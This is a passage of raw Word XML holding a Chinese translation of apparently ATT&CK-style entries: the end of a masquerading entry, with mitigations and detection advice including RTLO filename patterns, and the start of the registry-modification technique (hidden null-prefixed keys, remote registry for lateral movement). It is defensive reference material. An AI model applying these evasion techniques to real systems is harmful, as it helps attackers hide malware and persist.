        </w:rPr>
        <w:t>受信任位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t xml:space="preserve"> bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，会把恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>二进制文件命名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受信任二进制名称“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>rsyncd</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”和“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>dbus-inotifier</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC51B7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="9972" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7425"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="7855329C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="57BCA7C2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7B7CA865" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="005CF2B0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778377B1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>代码</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0993A63C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>要求有签名的二进制文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="040A5449" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08D707D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>执行预防</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C542B35" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对于所需的常用操作系统实用程序，请使用工具通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>属性白名单而不是文件名</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>限制</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>程序</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:t>执行</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00AF6363" w14:paraId="6588F154" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B501604" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>和目录权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>限制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7425" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A695258" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00AF6363" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过文件系统访问控制来保护文件夹，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C:\ Windows\System32</w:t>
            </w:r>
            <w:r w:rsidRPr="00AF6363">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="519F0AEA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D72A652" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12638689" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>采集文件哈希；与预期哈希不匹配的文件名是可疑的。执行文件监控；异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>位置出现</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的文件是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样，非升级</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>或打补丁期间所做的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改也是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2CFB15" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果磁盘上的文件名与二进制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>元数据的文件名不匹配，这可能表示二进制文件在编译后已被重命名。收集和比较二进制文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>磁盘和资源文件名以及查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>InternalName</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>OriginalFilename</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ProductName</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否与预期匹配可以提供有用的线索，但并不总是表示存在恶意活动。不要关注文件可能的名称，而应关注已知会使用的命令行参数。这些参数很</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>明确</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为这样会有更好的检测率。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA908C7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，检测方法应包括在文件名中查找</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符的常见格式，如“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>\u202E</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”、“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>[U+202E]</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”和“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>%E2%80%AE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。防御程序还应检查他们的分析工具，以确保工具不会解释</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RTLO</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字符，而是打印包含这些字符的文件的真实名称。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2A451" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注册表</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1555" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8181"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="18FA6308" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C269216" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1112</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EBF4DF3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C1E5C23" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73C1841A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F5CE08" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DEDFB06" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>取证分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DC3E129" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Bartosz Jerzman</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire; David Lu</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Tripwire</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA19C69" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="58B5D92F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5359D184" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表交互，在注册表项中隐藏配置信息，删除信息，或辅助</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>辅助执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C78EF1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能否访问注册表的特定区域取决于账号权限，有些需要管理员级别的访问权限。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内置的命令行实用程序</w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Reg</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可用于本地或远程注册表修改。还可以使用其他能通过调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（参见示例）与注册表交互的工具，例如远程访问工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC39328" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表修改还可以包括隐藏键的操作，例如在键名称前面加上一个空字符，这将导致使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>regor</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他实用程序通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">win32 </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>数据时出错并且被忽略。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会滥用这些伪隐藏密钥来隐藏用于建立持久性的负载</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F15D0B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以修改远程系统的注册表，辅助执行文件来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。前提是远程注册表服务需要在目标系统上运行。通常需要有效的账号，可以访问远程系统的</w:t>
      </w:r>
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidRPr="00671A0D">
          <w:rPr>
            <w:rStyle w:val="af4"/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>Windows Admin Shares</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
